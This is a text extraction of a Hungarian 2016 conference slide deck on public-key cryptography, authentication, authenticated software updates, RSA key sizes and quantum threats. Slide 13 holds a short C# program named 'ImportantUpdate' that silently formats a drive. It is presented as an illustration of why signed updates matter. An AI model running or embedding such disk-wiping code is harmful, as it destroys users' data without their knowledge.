Top Banner
Miért biztonságos az Internet? 40 éves a nyílt kulcsú kriptográfia Pethő Attila Egyetemi tanár, Debreceni Egyetem 3. Magyar Jövő Internet Konferencia Jövő internet trendek: Smart City a célkeresztben Budapest, 2016. november 10.
15

Miért biztonságos az Internet? 40 éves a nyílt kulcsú ...€¦ · Miért biztonságos az Internet? 40 éves a nyílt kulcsú kriptográfia Pethő Attila Egyetemi tanár, Debreceni

Jun 12, 2020

Download

Documents

dariahiddleston
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Page 1: Miért biztonságos az Internet? 40 éves a nyílt kulcsú ...€¦ · Miért biztonságos az Internet? 40 éves a nyílt kulcsú kriptográfia Pethő Attila Egyetemi tanár, Debreceni

MiértbiztonságosazInternet?40évesanyíltkulcsúkriptográfia

PethőAttilaEgyetemitanár,DebreceniEgyetem3.MagyarJövőInternetKonferencia

Jövőinternettrendek:Smart CityacélkeresztbenBudapest,2016.november10.

Page 2: Miért biztonságos az Internet? 40 éves a nyílt kulcsú ...€¦ · Miért biztonságos az Internet? 40 éves a nyílt kulcsú kriptográfia Pethő Attila Egyetemi tanár, Debreceni

Anyilvánoskulcsútitkosításfelfedezői

Whitfield DiffieMartinE.Hellman

NewDirections in Cryptography,IEEETrans on Inform.Theory,November1976

Page 3: Miért biztonságos az Internet? 40 éves a nyílt kulcsú ...€¦ · Miért biztonságos az Internet? 40 éves a nyílt kulcsú kriptográfia Pethő Attila Egyetemi tanár, Debreceni

40évvelezelőttírták

• […]applications create aneedfornewtypesofcryptographicsystemswhich minimizethenecessityofsecurekeydistributionchannels andsupplytheequivalentofawrittensignature.• Thedevelopmentofcomputercontrolledcommunication networkspromiseeffortlessandinexpensivecontact betweenpeopleorcomputersonoppositesidesofthe world,replacingmostmailandmanyexcursionswith telecommunications.• Máraezmegvalósult!Kialakultéshatékonyanműködikaglobálisnyíltkulcsúinfrastruktúra.

Page 4: Miért biztonságos az Internet? 40 éves a nyílt kulcsú ...€¦ · Miért biztonságos az Internet? 40 éves a nyílt kulcsú kriptográfia Pethő Attila Egyetemi tanár, Debreceni

Biztonságiparadoxon

• AzInternetegyóriásinyilvános hálózat,amelyhezmindenkicsatlakozhat.•Megkelloldania• Felhasználókazonosítását,• Adokumentumokhitelességénekazellenőrzését,• Kulcscserét ésabizalmasdokumentumoktitkosítását.

Page 5: Miért biztonságos az Internet? 40 éves a nyílt kulcsú ...€¦ · Miért biztonságos az Internet? 40 éves a nyílt kulcsú kriptográfia Pethő Attila Egyetemi tanár, Debreceni

Azonosítás

• Annakbizonyítása,hogyafelhasználóaz,akinekmondjamagát.• Bizonyíték=azonosító:egyedi,bizalmasadat,deanyilvánosInternetenküldjük.• Embereknéllehetségesabiometrikus azonosítás.• Szoftvereknél,kütyüknél,dnónoknál csakjelszó!?• Hogyanazonosítjákmajdmagukatananoérzékelők ésnanorobotok?• Rendelhet-ehűtőszekrényparizertPethőúrnak?

Page 6: Miért biztonságos az Internet? 40 éves a nyílt kulcsú ...€¦ · Miért biztonságos az Internet? 40 éves a nyílt kulcsú kriptográfia Pethő Attila Egyetemi tanár, Debreceni

Hitelesség

• Adokumentumnemváltozott/változtattákmegazátvitelsorán.• AzInternetfejlődéseszempontjábólkulcsfontosságú,hogyazújszoftvereketésszoftverfrissítésekethitelesenjuttassákelafelhasználóknak.Pozitívvisszacsatolás.• Járművekszoftverfrissítéseàműhelyekben.Lassúésköltséges.

Page 7: Miért biztonságos az Internet? 40 éves a nyílt kulcsú ...€¦ · Miért biztonságos az Internet? 40 éves a nyílt kulcsú kriptográfia Pethő Attila Egyetemi tanár, Debreceni

Frissítés1

Page 8: Miért biztonságos az Internet? 40 éves a nyílt kulcsú ...€¦ · Miért biztonságos az Internet? 40 éves a nyílt kulcsú kriptográfia Pethő Attila Egyetemi tanár, Debreceni

Frissítés2

Page 9: Miért biztonságos az Internet? 40 éves a nyílt kulcsú ...€¦ · Miért biztonságos az Internet? 40 éves a nyílt kulcsú kriptográfia Pethő Attila Egyetemi tanár, Debreceni

Frissítés3

Page 10: Miért biztonságos az Internet? 40 éves a nyílt kulcsú ...€¦ · Miért biztonságos az Internet? 40 éves a nyílt kulcsú kriptográfia Pethő Attila Egyetemi tanár, Debreceni

Frissítés4

Page 11: Miért biztonságos az Internet? 40 éves a nyílt kulcsú ...€¦ · Miért biztonságos az Internet? 40 éves a nyílt kulcsú kriptográfia Pethő Attila Egyetemi tanár, Debreceni

Frissítés4

• A2048bitkulcsméretajánlás20éves!

• Amérnökökpesszimistábbakvoltak,mintamatematikusok.

• Alegnagyobbfaktorizált számok:1994:256bit1999:512bit2009:768bit2016:változatlan

Page 12: Miért biztonságos az Internet? 40 éves a nyílt kulcsú ...€¦ · Miért biztonságos az Internet? 40 éves a nyílt kulcsú kriptográfia Pethő Attila Egyetemi tanár, Debreceni

Miértkellezacécó?

Mertpl.egyegyszerűkóddallelehettörölnialemezektartalmát!

Page 13: Miért biztonságos az Internet? 40 éves a nyílt kulcsú ...€¦ · Miért biztonságos az Internet? 40 éves a nyílt kulcsú kriptográfia Pethő Attila Egyetemi tanár, Debreceni

using System;using System.Collections.Generic;using System.Linq;using System.Text;

namespace ImportantUpdate{class Run{public static void Main(String[]args){

FormatDrive('E');}public static void FormatDrive(

char driveLetter,string fileSystem ="NTFS",bool quickFormat =true)

{string drive=driveLetter +":";vardi=new System.IO.DriveInfo(drive);

varprocess =new System.Diagnostics.ProcessStartInfo();process.FileName ="format.com";process.WorkingDirectory =Environment.SystemDirectory;process.Arguments =

"/FS:"+fileSystem +"/Y"+(quickFormat ?"/Q":"")+""+drive;

process.UseShellExecute =false;process.CreateNoWindow =true;varformatProcess =System.Diagnostics.Process.Start(process);

}}

}

Page 14: Miért biztonságos az Internet? 40 éves a nyílt kulcsú ...€¦ · Miért biztonságos az Internet? 40 éves a nyílt kulcsú kriptográfia Pethő Attila Egyetemi tanár, Debreceni

Titkosítás

• Látszólagsosehasználjuk.• Gyakranfolytatunkbizalmasüzenetváltást:• Bankitranzakciók• Egészségiállapotravonatkozóadatok• Számlák,adóbevallás,stb.

• Atitkosításaháttérbentörténik.• Veszélyeseszközpl.aterroristákkezében.

Page 15: Miért biztonságos az Internet? 40 éves a nyílt kulcsú ...€¦ · Miért biztonságos az Internet? 40 éves a nyílt kulcsú kriptográfia Pethő Attila Egyetemi tanár, Debreceni

Merrefejlődikakriptográfia?

• Nagyonrossztapasztalatokazoktatásban!• Amahasználtnyíltkulcsúkriptográfiaialgoritmusok– RSA,ECC– feltörhetőekkvantumalgoritmussal(Shor,1994).• AlegnagyobbShor algoritmussaltényezőkrebontottszám:15.• Léteznekkvantum-rezisztensnyíltkulcsúkriptográfiaialgoritmusok,deakulcsaikéserőforrásigényükisnagyok.• AzIoT pehelykönnyűalgoritmusokatisigényel!